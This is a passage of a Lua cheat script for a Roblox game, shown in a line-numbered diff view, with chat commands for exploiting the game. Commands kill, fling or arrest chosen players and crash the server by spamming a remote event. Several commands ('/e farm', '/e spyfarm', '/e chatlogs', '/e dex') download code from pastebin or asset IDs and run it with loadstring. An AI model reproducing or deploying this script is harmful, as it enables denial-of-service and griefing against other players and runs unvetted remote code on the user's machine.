| 720 | elseif msg == "/e stopbag" then | |
| 721 | bag = false | |
| 722 | elseif msg:sub(1,9) == "/e arrest" then | |
| 723 | ||
| 724 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 725 | if v.Name:lower():sub(1,#msg:sub(11)) == msg:sub(11):lower() then | |
| 726 | Not("Arresting "..v.Name, 145360599, "Arrest System")
| |
| 727 | if game.Players.LocalPlayer.Backpack:FindFirstChild("[RPG]") then
| |
| 728 | game.Players.LocalPlayer.Backpack:FindFirstChild("[RPG]").Parent = game.Players.LocalPlayer.Character
| |
| 729 | end | |
| 730 | nuking = true | |
| 731 | nukerowner = v.Name | |
| 732 | game.Players.LocalPlayer.Character:FindFirstChild("[RPG]"):Activate()
| |
| 733 | repeat | |
| 734 | if workspace.Players:FindFirstChild(v.Name) then | |
| 735 | if workspace.Players[v.Name].BodyEffects["K.O"].Value == true then | |
| 736 | if game.Players.LocalPlayer.Backpack:FindFirstChild("Cuff") then
| |
| 737 | game.Players.LocalPlayer.Backpack:FindFirstChild("Cuff").Parent = game.Players.LocalPlayer.Character
| |
| 738 | end | |
| 739 | game.Players.LocalPlayer.Character:FindFirstChild("Cuff"):Activate()
| |
| 740 | game.Players.LocalPlayer.Character:MoveTo(workspace.Players[v.Name].Head.Position) | |
| 741 | if workspace:FindFirstChild("Core") then
| |
| 742 | workspace.Core:Destroy() | |
| 743 | end | |
| 744 | flying = false | |
| 745 | end | |
| 746 | end | |
| 747 | wait() | |
| 748 | until workspace.Players[nukerowner].BodyEffects["Cuff"].Value == true | |
| 749 | ||
| 750 | break | |
| 751 | end | |
| 752 | end | |
| 753 | elseif msg == "/e stomp" then | |
| 754 | if autostomp == false then | |
| 755 | autostomp = true | |
| 756 | Not("Auto-Stomp set to true", 145360599, "Stomp System")
| |
| 757 | elseif autostomp == true then | |
| 758 | autostomp = false | |
| 759 | Not("Auto-Stomp set to false", 145360599, "Stomp System")
| |
| 760 | end | |
| 761 | elseif msg == "/e crash" then | |
| 762 | if game.Players.LocalPlayer.Backpack:FindFirstChild("[Phone]") then
| |
| 763 | game.Players.LocalPlayer.Backpack:FindFirstChild("[Phone]").Parent = game.Players.LocalPlayer.Character
| |
| 764 | end | |
| 765 | for i = 1, 1500 do | |
| 766 | for i, v in pairs(game.Players:GetPlayers()) do | |
| 767 | local A_1 = "PhoneCall" | |
| 768 | local A_2 = v.Name | |
| 769 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 770 | Event:FireServer(A_1, A_2) | |
| 771 | end | |
| 772 | end | |
| 773 | elseif msg == "/e unview" then | |
| 774 | local camera = workspace:FindFirstChildOfClass("Camera")
| |
| 775 | camera.CameraSubject = game.Players.LocalPlayer.Character.Humanoid | |
| 776 | Not("View set to false", 145360599, "View System")
| |
| 777 | elseif msg:sub(1, 7) == "/e copy" then | |
| 778 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 779 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 780 | setclipboard(v.Name) | |
| 781 | Not("Copied to clipboard "..v.Name, 145360599, "Copy System")
| |
| 782 | end | |
| 783 | end | |
| 784 | elseif msg:sub(1, 7) == "/e view" then | |
| 785 | ||
| 786 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 787 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 788 | if workspace.Players[v.Name] then | |
| 789 | Not("Viewing "..v.Name, 145360599, "View System")
| |
| 790 | local camera = workspace:FindFirstChildOfClass("Camera")
| |
| 791 | camera.CameraSubject = workspace.Players[v.Name].Humanoid | |
| 792 | end | |
| 793 | end | |
| 794 | end | |
| 795 | elseif msg == "/e banned" and onlyfansxd == true then | |
| 796 | if banned == false then | |
| 797 | banned = true | |
| 798 | Not("Banned switch to true", 145360599, "Ban System")
| |
| 799 | ||
| 800 | elseif banned == true then | |
| 801 | banned = false | |
| 802 | Not("Banned switch to false", 145360599, "Ban System")
| |
| 803 | end | |
| 804 | elseif msg:sub(1, 7) == "/e kill" then | |
| 805 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 806 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 807 | punchreachrr = v.Name | |
| 808 | Not("Killing "..punchreachrr, 145360599, "Killing System")
| |
| 809 | if game.Players.LocalPlayer.Backpack:FindFirstChild(reachthing) then | |
| 810 | game.Players.LocalPlayer.Backpack:FindFirstChild(reachthing).Parent = game.Players.LocalPlayer.Character | |
| 811 | end | |
| 812 | wait() | |
| 813 | game.Players.LocalPlayer.Character:FindFirstChild(reachthing):Activate() | |
| 814 | punchreach = true | |
| 815 | local cor = coroutine.wrap(function() | |
| 816 | wait(3) | |
| 817 | punchreach = false | |
| 818 | local lol = game.Players.LocalPlayer.Character.HumanoidRootPart | |
| 819 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(1, 0.5, 1) | |
| 820 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(1, 0.5, 1) | |
| 821 | for i = 1, 10 do | |
| 822 | game.Players.LocalPlayer.Character.RightHand.CFrame = lol.CFrame | |
| 823 | game.Players.LocalPlayer.Character.LeftHand.CFrame = lol.CFrame | |
| 824 | wait(0.05) | |
| 825 | end | |
| 826 | ||
| 827 | end) | |
| 828 | cor() | |
| 829 | game:service'RunService'.Heartbeat:Connect(function(step) | |
| 830 | if punchreach == true then | |
| 831 | pcall(function() | |
| 832 | if game.Players.LocalPlayer.Character.RightHand:FindFirstChildOfClass("Model") then
| |
| 833 | game.Players.LocalPlayer.Character.RightHand.Model.RightWrist:Destroy() | |
| 834 | end | |
| 835 | ||
| 836 | game.Players.LocalPlayer.Character.RightHand.RightWrist:Destroy() | |
| 837 | ||
| 838 | end) | |
| 839 | pcall(function() | |
| 840 | if game.Players.LocalPlayer.Character.LeftHand:FindFirstChildOfClass("Model") then
| |
| 841 | game.Players.LocalPlayer.Character.LeftHand.Model.LeftWrist:Destroy() | |
| 842 | end | |
| 843 | game.Players.LocalPlayer.Character.LeftHand.LeftWrist:Destroy() | |
| 844 | end) | |
| 845 | local Part = workspace.Players[punchreachrr].UpperTorso | |
| 846 | ||
| 847 | game.Players.LocalPlayer.Character.RightHand.CFrame = CFrame.new(Part.CFrame.X ,Part.CFrame.Y+2, Part.CFrame.Z) | |
| 848 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 849 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(5, 5, 5) | |
| 850 | game.Players.LocalPlayer.Character.LeftHand.CFrame = CFrame.new(Part.CFrame.X ,Part.CFrame.Y+2, Part.CFrame.Z) | |
| 851 | game.Players.LocalPlayer.Character.LeftHand.Massless = true | |
| 852 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(5, 5, 5) | |
| 853 | end | |
| 854 | end) | |
| 855 | ||
| 856 | break | |
| 857 | end | |
| 858 | ||
| 859 | end | |
| 860 | ||
| 861 | elseif msg == "/e nuke" then | |
| 862 | if nuking == false then | |
| 863 | nuking = true | |
| 864 | chat("[Spy] Tactical Nuke set to true")
| |
| 865 | Not("Tactical Nuke set to true", 145360599, "Nuke Switch")
| |
| 866 | elseif nuking == true then | |
| 867 | nuking = false | |
| 868 | chat("[Spy] Tactical Nuke set to false")
| |
| 869 | Not("Tactical Nuke set to false", 145360599, "Nuke Switch")
| |
| 870 | end | |
| 871 | ||
| 872 | elseif msg:sub(1, 9) == "/e target" then | |
| 873 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 874 | if v.Name:lower():sub(1,#msg:sub(11)) == msg:sub(11):lower() then | |
| 875 | local plr = v | |
| 876 | nukerowner = plr.Name | |
| 877 | chat("[Spy] Target switched to "..nukerowner)
| |
| 878 | Not("Target switched to "..nukerowner, 145360599, "Target Switch")
| |
| 879 | break | |
| 880 | end | |
| 881 | end | |
| 882 | elseif msg == "/e spyfarm" then | |
| 883 | delay(0, function() | |
| 884 | loadstring(game:HttpGet('https://pastebin.com/raw/z17wDE8W'))()
| |
| 885 | end) | |
| 886 | ||
| 887 | ||
| 888 | delay(1, function() | |
| 889 | ||
| 890 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(2,2, 2) | |
| 891 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(2,2, 2) | |
| 892 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 893 | game.Players.LocalPlayer.Character.LeftHand.Massless = true | |
| 894 | ||
| 895 | game.CoreGui.PostmansAutoRob.HeaderF.TextLabel.Text = 'AUTOROB V2 Spy Edition' | |
| 896 | ||
| 897 | game.CoreGui.PostmansAutoRob.HeaderF.TextLabel.Font = Enum.Font.Gotham | |
| 898 | ||
| 899 | game.CoreGui.PostmansAutoRob.HeaderF.TextLabel.TextColor3 = Color3.fromRGB(220,220,220) | |
| 900 | ||
| 901 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.AutoGrindB.Text = 'AutoRob V2' | |
| 902 | ||
| 903 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.AutoGrindB.TextColor3 = Color3.fromRGB(1,1,1) | |
| 904 | ||
| 905 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.BackgroundTransparency = 0 | |
| 906 | ||
| 907 | game.CoreGui.PostmansAutoRob.HeaderF.BackgroundTransparency = 0 | |
| 908 | ||
| 909 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.BodyF.BackgroundTransparency = 0 | |
| 910 | ||
| 911 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.TeleportsB.Visible = false | |
| 912 | ||
| 913 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.ScriptsB.Visible = false | |
| 914 | ||
| 915 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.CreditsB.Visible = false | |
| 916 | ||
| 917 | game.CoreGui.PostmansAutoRob.HeaderF.BackgroundColor3 = Color3.fromRGB(30,30,30) | |
| 918 | ||
| 919 | game.CoreGui.PostmansAutoRob.HeaderF.TabsF.BodyF.BackgroundColor3 = Color3.fromRGB(15,15,15) | |
| 920 | ||
| 921 | ||
| 922 | ||
| 923 | ||
| 924 | ||
| 925 | ||
| 926 | game.CoreGui.PostmansAutoRob.HeaderF.CloseB.MouseButton1Click:Connect(function() | |
| 927 | ||
| 928 | wait() | |
| 929 | ||
| 930 | game.CoreGui:FindFirstChild('PostmansAutoRob'):Destroy()
| |
| 931 | ||
| 932 | end) | |
| 933 | end) | |
| 934 | elseif msg == "/e break" then | |
| 935 | local Stuff = {"RightHand", "LeftHand","RightUpperArm","RightLowerArm","LeftUpperArm","LeftLowerArm","Head","UpperTorso"}
| |
| 936 | ||
| 937 | pcall(function() | |
| 938 | for i, v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do | |
| 939 | for z, AdminName in ipairs(Stuff) do | |
| 940 | if v.Name == AdminName then | |
| 941 | if v:FindFirstChildOfClass("Motor6D") then
| |
| 942 | local Weld = v:FindFirstChildOfClass("Motor6D")
| |
| 943 | Weld:Destroy() | |
| 944 | end | |
| 945 | end | |
| 946 | end | |
| 947 | end | |
| 948 | end) | |
| 949 | elseif msg:sub(1, 8) == "/e fling" then | |
| 950 | ||
| 951 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 952 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 953 | local Party = Instance.new("Part",workspace)
| |
| 954 | Party.Name = "Shit" | |
| 955 | Party.CanCollide = false | |
| 956 | Party.Anchored = false | |
| 957 | Party.Size = Vector3.new(0, 0, 0) | |
| 958 | Party.Massless = true | |
| 959 | local Weld = Instance.new("Weld",Party)
| |
| 960 | Weld.Part0 = Party | |
| 961 | Weld.Part1 = game.Players.LocalPlayer.Character.HumanoidRootPart | |
| 962 | HasDied = false | |
| 963 | local bodyp = Instance.new("BodyPosition",Party)
| |
| 964 | bodyp.D = 0 | |
| 965 | bodyp.MaxForce = Vector3.new(math.huge,math.huge,math.huge) | |
| 966 | bodyp.P = 15000 | |
| 967 | Not("Curently killing "..v.Name, 145360599, "Fling System")
| |
| 968 | local Target = workspace.Players[v.Name] | |
| 969 | ||
| 970 | repeat | |
| 971 | game:GetService("RunService").RenderStepped:Wait()
| |
| 972 | pcall(function() | |
| 973 | ||
| 974 | if Target.BodyEffects["K.O"].Value == true then | |
| 975 | HasDied = true | |
| 976 | end | |
| 977 | if Target.BodyEffects:FindFirstChild("K.O") == nil then
| |
| 978 | HasDied = true | |
| 979 | ||
| 980 | end | |
| 981 | if HasDied == false then | |
| 982 | bodyp.Position = Target.PrimaryPart.Position | |
| 983 | end | |
| 984 | end) | |
| 985 | until HasDied == true | |
| 986 | ||
| 987 | Party:Destroy() | |
| 988 | for i = 1, 10 do | |
| 989 | game.Players.LocalPlayer.Character:MoveTo(Target.LowerTorso.Position) | |
| 990 | wait(0.1) | |
| 991 | end | |
| 992 | break | |
| 993 | end | |
| 994 | ||
| 995 | end | |
| 996 | ||
| 997 | ||
| 998 | elseif msg == "/e spy" then | |
| 999 | if spyfunction == true then | |
| 1000 | spyfunction = false | |
| 1001 | Not("Spy chat switched to false", 145360599, "Spy Switch")
| |
| 1002 | print'off' | |
| 1003 | else | |
| 1004 | if spyfunction == false then | |
| 1005 | Not("Spy chat switched to true", 145360599, "Spy Switch")
| |
| 1006 | spyfunction = true | |
| 1007 | print'on' | |
| 1008 | end | |
| 1009 | ||
| 1010 | end | |
| 1011 | elseif msg == "/e dex" then | |
| 1012 | loadstring(game:GetObjects("rbxassetid://5135376550")[1].Source)()
| |
| 1013 | elseif msg == "/e farm" then | |
| 1014 | if bruh == false then | |
| 1015 | bruh = true | |
| 1016 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(2, 2, 2) | |
| 1017 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(2, 2, 2) | |
| 1018 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 1019 | game.Players.LocalPlayer.Character.LeftHand.Massless = true | |
| 1020 | ||
| 1021 | loadstring(game:HttpGet(('https://pastebin.com/raw/HhZuQFXa'),true))()
| |
| 1022 | ||
| 1023 | ||
| 1024 | ||
| 1025 | else | |
| 1026 | bruh = false | |
| 1027 | if game.CoreGui:FindFirstChild("ScreenGui")then game.CoreGui:FindFirstChild("ScreenGui"):Destroy()end
| |
| 1028 | game.Players.LocalPlayer.Character.RightHand.Size = Vector3.new(1, 1, 1) | |
| 1029 | game.Players.LocalPlayer.Character.LeftHand.Size = Vector3.new(1, 1, 1) | |
| 1030 | game.Players.LocalPlayer.Character.RightHand.Massless = true | |
| 1031 | game.Players.LocalPlayer.Character.LeftHand.Massless = true | |
| 1032 | end | |
| 1033 | elseif msg == "/e head" then | |
| 1034 | pcall(function() | |
| 1035 | game.Players.LocalPlayer.Character.Head.Neck:Destroy() | |
| 1036 | game.Players.LocalPlayer.Character.UpperTorso.NeckAttachment:Destroy() | |
| 1037 | game.Players.LocalPlayer.Character.Humanoid.HealthDisplayDistance = math.huge | |
| 1038 | game.Players.LocalPlayer.Character.Humanoid.NameDisplayDistance = math.huge | |
| 1039 | game.Players.LocalPlayer.Character.Head.Size = Vector3.new(0,0,0) | |
| 1040 | game.Players.LocalPlayer.Character.Head.Massless = true | |
| 1041 | game.Players.LocalPlayer.Character.Head.CanCollide = false | |
| 1042 | ||
| 1043 | heazd = true | |
| 1044 | ||
| 1045 | while heazd == true do | |
| 1046 | pcall(function() | |
| 1047 | game.Players.LocalPlayer.Character.Head.NeckRigAttachment.CFrame = CFrame.new(0, 100000.4736328125, 0) | |
| 1048 | game.Players.LocalPlayer.Character.UpperTorso.NeckRigAttachment.CFrame = CFrame.new(0, 100000.4736328125, 0) | |
| 1049 | game.Players.LocalPlayer.Character.Head.CFrame = CFrame.new(0, 100000.4736328125, 0) | |
| 1050 | end) | |
| 1051 | wait() | |
| 1052 | end | |
| 1053 | end) | |
| 1054 | ||
| 1055 | ||
| 1056 | elseif msg:sub(1, 8) == "/e owner" then | |
| 1057 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1058 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 1059 | local plr = v | |
| 1060 | owner = plr.Name | |
| 1061 | chat("[Spy] Owner switched to "..owner)
| |
| 1062 | Not("Owner switched to "..owner, 145360599, "Owner Switch")
| |
| 1063 | break | |
| 1064 | end | |
| 1065 | end | |
| 1066 | elseif msg == "/e fly" then | |
| 1067 | ||
| 1068 | Not("Fly has been switched to keybind C", 145360599, "System Problem")
| |
| 1069 | ||
| 1070 | elseif msg:sub(1, 6) == "/e add" then | |
| 1071 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1072 | if v.Name:lower():sub(1,#msg:sub(8)) == msg:sub(8):lower() then | |
| 1073 | if PLAYERSERVERS:FindFirstChild(v.Name) == nil then | |
| 1074 | local plr = v | |
| 1075 | owner = plr.Name | |
| 1076 | chat("[Spy] "..owner.." was added to Whitelist")
| |
| 1077 | Not(owner.." was added to Whitelist", 145360599, "Owner Switch") | |
| 1078 | CreateValue(owner, "none", PLAYERSERVERS) | |
| 1079 | end | |
| 1080 | break | |
| 1081 | end | |
| 1082 | end | |
| 1083 | elseif msg:sub(1, 9) == "/e remove" then | |
| 1084 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1085 | if v.Name:lower():sub(1,#msg:sub(11)) == msg:sub(11):lower() then | |
| 1086 | if PLAYERSERVERS:FindFirstChild(v.Name)then | |
| 1087 | local plr = v | |
| 1088 | owner = plr.Name | |
| 1089 | chat("[Spy] "..owner.." was removed from Whitelist")
| |
| 1090 | Not(owner.." was removed from Whitelist", 145360599, "Owner Switch") | |
| 1091 | RemoveValue(owner,"none", PLAYERSERVERS) | |
| 1092 | end | |
| 1093 | break | |
| 1094 | end | |
| 1095 | end | |
| 1096 | elseif msg == "/e reload on" then | |
| 1097 | reload = true | |
| 1098 | chat("[Spy] Reload Status: On")
| |
| 1099 | Not("Reload set to true", 145360599, "Reloader")
| |
| 1100 | while wait() do | |
| 1101 | if reload == true then | |
| 1102 | pcall(function() | |
| 1103 | for i, v in pairs(PLAYERSERVERS:GetChildren()) do | |
| 1104 | if workspace.Players:FindFirstChild(v.Name) then | |
| 1105 | if workspace.Players[v.Name]:FindFirstChild(gunz) and workspace.Players[v.Name]:FindFirstChild(gunz).Ammo.Value < workspace.Players[v.Name]:FindFirstChild(gunz).MaxAmmo.Value then | |
| 1106 | local A_1 = "Reload" | |
| 1107 | local A_2 = game:GetService("Workspace").Players[v.Name][gunz]
| |
| 1108 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 1109 | Event:FireServer(A_1, A_2) | |
| 1110 | end | |
| 1111 | end | |
| 1112 | end | |
| 1113 | end) | |
| 1114 | end | |
| 1115 | end | |
| 1116 | elseif msg == "/e reload off" then | |
| 1117 | reload = false | |
| 1118 | chat("[Spy] Reload Status: Off")
| |
| 1119 | Not("Reload set to false", 145360599, "Reloader")
| |
| 1120 | elseif msg == "/e lag on" then | |
| 1121 | Not("Lag set to true", 145360599, "Lag Spike")
| |
| 1122 | lagspike = true | |
| 1123 | while wait() do | |
| 1124 | if lagspike == true then | |
| 1125 | game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true | |
| 1126 | wait(0.15) | |
| 1127 | game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false | |
| 1128 | end | |
| 1129 | end | |
| 1130 | ||
| 1131 | elseif msg == "/e lag off" then | |
| 1132 | lagspike = false | |
| 1133 | Not("Lag set to false", 145360599, "Lag Spike")
| |
| 1134 | elseif msg:sub(1, 5) == "/e tp" then | |
| 1135 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1136 | if v.Name:lower():sub(1,#msg:sub(7)) == msg:sub(7):lower() then | |
| 1137 | local plr = v | |
| 1138 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1139 | chat("[Spy] Teleporting to: "..plr.Name)
| |
| 1140 | Not("Teleporting to: "..plr.Name, 145360599, "Teleporter")
| |
| 1141 | tp(plr.Character.UpperTorso.Position.X,plr.Character.UpperTorso.Position.Y,plr.Character.UpperTorso.Position.Z) | |
| 1142 | break | |
| 1143 | end | |
| 1144 | end | |
| 1145 | end | |
| 1146 | elseif msg == "/e god" then | |
| 1147 | game.Players.LocalPlayer.Character.BodyEffects.Armor:Destroy() | |
| 1148 | Not("God mode set true", 145360599, "God Mode")
| |
| 1149 | elseif msg:sub(1, 8) == "/e armor" then | |
| 1150 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1151 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 1152 | local plr = v | |
| 1153 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1154 | if workspace.Players[plr.Name].BodyEffects.Armor.Value > 5 then | |
| 1155 | chat("[Spy] "..plr.Name.." got Armor")
| |
| 1156 | Not(plr.Name.." got Armor", 145360599, "Armor Checker") | |
| 1157 | else | |
| 1158 | chat("[Spy] "..plr.Name.." doesn't got Armor")
| |
| 1159 | Not(plr.Name.." doesn't got Armor", 145360599, "Armor Checker") | |
| 1160 | end | |
| 1161 | break | |
| 1162 | end | |
| 1163 | end | |
| 1164 | end | |
| 1165 | elseif msg:sub(1, 7) == "/e call" then | |
| 1166 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1167 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 1168 | local plr = v | |
| 1169 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1170 | local A_1 = "PhoneCall" | |
| 1171 | local A_2 = plr.Name | |
| 1172 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 1173 | Event:FireServer(A_1, A_2) | |
| 1174 | chat("[Spy] Calling "..plr.name)
| |
| 1175 | Not("Calling "..plr.name, 145360599, "Caller")
| |
| 1176 | break | |
| 1177 | end | |
| 1178 | end | |
| 1179 | end | |
| 1180 | elseif msg:sub(1, 10) == "/e friends" then | |
| 1181 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1182 | if v.Name:lower():sub(1,#msg:sub(12)) == msg:sub(12):lower() then | |
| 1183 | local plr = v | |
| 1184 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1185 | for i,z in pairs(game.Players:GetPlayers()) do | |
| 1186 | if plr:IsFriendsWith(z.UserId) then | |
| 1187 | chat("[Spy] "..plr.Name.." has as friend "..z.Name)
| |
| 1188 | Not(plr.Name.." has as friend "..z.Name, "Friends Checker") | |
| 1189 | wait(3) | |
| 1190 | end | |
| 1191 | end | |
| 1192 | end | |
| 1193 | end | |
| 1194 | end | |
| 1195 | elseif msg:sub(1, 7) == "/e kick" then | |
| 1196 | onlyfans = "https://phantomxx.000webhostapp.com/spypremium" | |
| 1197 | - | onlyfans = "https://pastebin.com/raw/6zbiucSW" |
| 1197 | + | |
| 1198 | if not string.find(xdfasfasf,current) and not string.find(xdfasfasf,currentid) then | |
| 1199 | Not("Only Premium Customers can use this function!", 145360599, "System Problem")
| |
| 1200 | end | |
| 1201 | ||
| 1202 | elseif msg:sub(1, 7) == "/e drop" and cashdrop == false then | |
| 1203 | cashdrop = true | |
| 1204 | local id = msg:match("%d+")
| |
| 1205 | local A_1 = "DropMoney" | |
| 1206 | local A_2 = id | |
| 1207 | local Event = game:GetService("ReplicatedStorage").MainEvent
| |
| 1208 | Event:FireServer(A_1, A_2) | |
| 1209 | chat("[Spy] Dropping $"..id.." cash")
| |
| 1210 | Not("Dropping $"..id.." cash", 145360599, "Cash Drop")
| |
| 1211 | local cor = coroutine.wrap(function() | |
| 1212 | wait(10) | |
| 1213 | cashdrop = false | |
| 1214 | end) | |
| 1215 | cor() | |
| 1216 | elseif msg:sub(1, 9) == "/e bounty" then | |
| 1217 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1218 | if v.Name:lower():sub(1,#msg:sub(11)) == msg:sub(11):lower() then | |
| 1219 | local plr = v | |
| 1220 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1221 | if game.Players[plr.Name].leaderstats.Wanted.Value > 1 then | |
| 1222 | local cursed = game.Players[plr.Name].leaderstats.Wanted | |
| 1223 | chat("[Spy] "..plr.Name.." has "..money(cursed.Value).." bounty")
| |
| 1224 | Not(plr.Name.." has "..money(cursed.Value).." bounty", 145360599, "Bounty Checker") | |
| 1225 | else | |
| 1226 | chat("[Spy] "..plr.Name.." has no bounty")
| |
| 1227 | Not(plr.Name.." has no bounty", 145360599, "Bounty Checker") | |
| 1228 | end | |
| 1229 | break | |
| 1230 | end | |
| 1231 | end | |
| 1232 | end | |
| 1233 | elseif msg:sub(1, 7) == "/e ammo" then | |
| 1234 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1235 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 1236 | local plr = v | |
| 1237 | if plr.Character:FindFirstChild("Humanoid") and plr.Backpack:FindFirstChild(gunz) then
| |
| 1238 | local ammo = plr.Backpack[gunz].Ammo.Value | |
| 1239 | local ammo1 = plr.Backpack[gunz].MaxAmmo.Value | |
| 1240 | chat("[Spy] "..plr.Name.." has "..ammo.."/"..ammo1.." ammo")
| |
| 1241 | Not(plr.Name.." has "..ammo.."/"..ammo1.." ammo", 145360599, "Ammo Checker") | |
| 1242 | elseif plr.Character:FindFirstChild("Humanoid") and plr.Character:FindFirstChild(gunz) then
| |
| 1243 | local ammo = plr.Character[gunz].Ammo.Value | |
| 1244 | local ammo1 = plr.Character[gunz].MaxAmmo.Value | |
| 1245 | chat("[Spy] "..plr.Name.." has "..ammo.."/"..ammo1.." ammo")
| |
| 1246 | Not(plr.Name.." has "..ammo.."/"..ammo1.."ammo", 145360599, "Ammo Checker") | |
| 1247 | else | |
| 1248 | chat("[Spy] "..plr.Name.." doesn't got the specified gun")
| |
| 1249 | Not(plr.Name.." doesn't doesn't got the specified gun", 145360599, "Ammo Checker") | |
| 1250 | end | |
| 1251 | break | |
| 1252 | end | |
| 1253 | end | |
| 1254 | elseif msg:sub(1, 7) == "/e crew" then | |
| 1255 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1256 | if v.Name:lower():sub(1,#msg:sub(9)) == msg:sub(9):lower() then | |
| 1257 | local plr = v | |
| 1258 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1259 | local GroupService = game:GetService("GroupService"):GetGroupInfoAsync(plr.DataFolder.Information.Crew.Value)
| |
| 1260 | local SayRank = plr:GetRoleInGroup(plr.DataFolder.Information.Crew.Value) | |
| 1261 | chat("[Spy] "..plr.Name.."'s crew is "..GroupService.Name.." Rank: "..SayRank)
| |
| 1262 | Not(plr.Name.."'s crew is "..GroupService.Name, 145360599, "Crew Checker") | |
| 1263 | break | |
| 1264 | end | |
| 1265 | end | |
| 1266 | end | |
| 1267 | elseif msg:sub(1, 8) == "/e delay" then | |
| 1268 | local id = msg:match("%d+")
| |
| 1269 | bspeed = id | |
| 1270 | Not("Gun delay switched to "..bspeed, 145360599, "Aim Bot System")
| |
| 1271 | elseif msg:sub(1, 8) == "/e radio" then | |
| 1272 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1273 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 1274 | local plr = v | |
| 1275 | local SoundIdZ = workspace.Players[plr.Name].LowerTorso.BOOMBOXSOUND | |
| 1276 | local id = SoundIdZ.SoundId:match("%d+")
| |
| 1277 | local Asset = game:GetService("MarketplaceService"):GetProductInfo(id)
| |
| 1278 | if plr.Character:FindFirstChild("Humanoid") then
| |
| 1279 | chat("[Spy] "..plr.Name.." listens to "..Asset.Name)
| |
| 1280 | Not(plr.Name.."'s boombox id is "..id, 145360599, "Radio Checker") | |
| 1281 | print(Asset.Name.." - "..id) | |
| 1282 | setclipboard(id) | |
| 1283 | break | |
| 1284 | end | |
| 1285 | end | |
| 1286 | end | |
| 1287 | elseif msg == "/e chatlogs" then | |
| 1288 | if chatlogs == false then | |
| 1289 | if not game.CoreGui:FindFirstChild("LogHolder") then
| |
| 1290 | loadstring(game:HttpGet(('https://pastebin.com/raw/Y8yW6Nas'),true))()
| |
| 1291 | ||
| 1292 | end | |
| 1293 | chatlogs = true | |
| 1294 | game.CoreGui.LogHolder.Enabled =true | |
| 1295 | elseif chatlogs == true then | |
| 1296 | ||
| 1297 | game.CoreGui.LogHolder.Enabled =false | |
| 1298 | chatlogs = false | |
| 1299 | ||
| 1300 | end | |
| 1301 | elseif msg:sub(1, 8) == "/e shirt" then | |
| 1302 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1303 | if v.Name:lower():sub(1,#msg:sub(10)) == msg:sub(10):lower() then | |
| 1304 | local plr = v | |
| 1305 | ||
| 1306 | if plr.Character:FindFirstChild("Humanoid") and workspace.Players[plr.Name]:FindFirstChildOfClass("Shirt") then
| |
| 1307 | local SoundIdZ = workspace.Players[plr.Name]:FindFirstChildOfClass("Shirt")
| |
| 1308 | local id = SoundIdZ.ShirtTemplate:match("%d+")
| |
| 1309 | local Asset = game:GetService("MarketplaceService"):GetProductInfo(id)
| |
| 1310 | chat("[Spy] "..plr.Name.."'s shirt called "..Asset.Name)
| |
| 1311 | Not(plr.Name.."'s shirt called "..Asset.Name, 145360599, "Shirt Checker") | |
| 1312 | print(Asset.Name.." - "..id) | |
| 1313 | setclipboard(id) | |
| 1314 | break | |
| 1315 | end | |
| 1316 | end | |
| 1317 | end | |
| 1318 | elseif msg:sub(1, 6) == "/e cos" then | |
| 1319 | for i,v in pairs(game.Players:GetPlayers()) do | |
| 1320 | if v.Name:lower():sub(1,#msg:sub(8)) == msg:sub(8):lower() then | |
| 1321 | local plr = v | |
| 1322 | ||
